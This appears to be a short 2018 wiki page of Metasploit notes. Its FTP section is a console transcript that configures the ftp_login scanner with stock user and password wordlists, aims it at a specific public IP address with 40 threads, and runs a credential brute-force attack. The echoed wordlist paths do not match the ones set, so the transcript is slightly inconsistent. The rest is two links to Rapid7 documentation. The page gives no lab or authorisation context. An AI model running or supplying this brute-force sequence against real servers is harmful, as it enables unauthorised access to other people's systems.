Metasploit
Revision as of 14:24, 3 April 2018 by Rafahsolis (talk | contribs)
FTP[edit]
msf > search ftp_login Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/ftp/ftp_login msf > use auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt pass_file => /opt/framework/msf3/data/wordlists/unix_passwords.txt msf auxiliary(ftp_login) > set user_file /usr/share/metasploit-framework/data/wordlists/unix_users.txt user_file => /opt/framework/msf3/data/wordlists/unix_users.txt msf auxiliary(ftp_login) > set rhosts 81.39.212.75 rhosts => 81.39.212.75 msf auxiliary(ftp_login) > set threads 40 msf auxiliary(ftp_login) > run
Pro[edit]
https://metasploit.help.rapid7.com/docs/metasploit-basics
https://metasploit.help.rapid7.com/docs/getting-started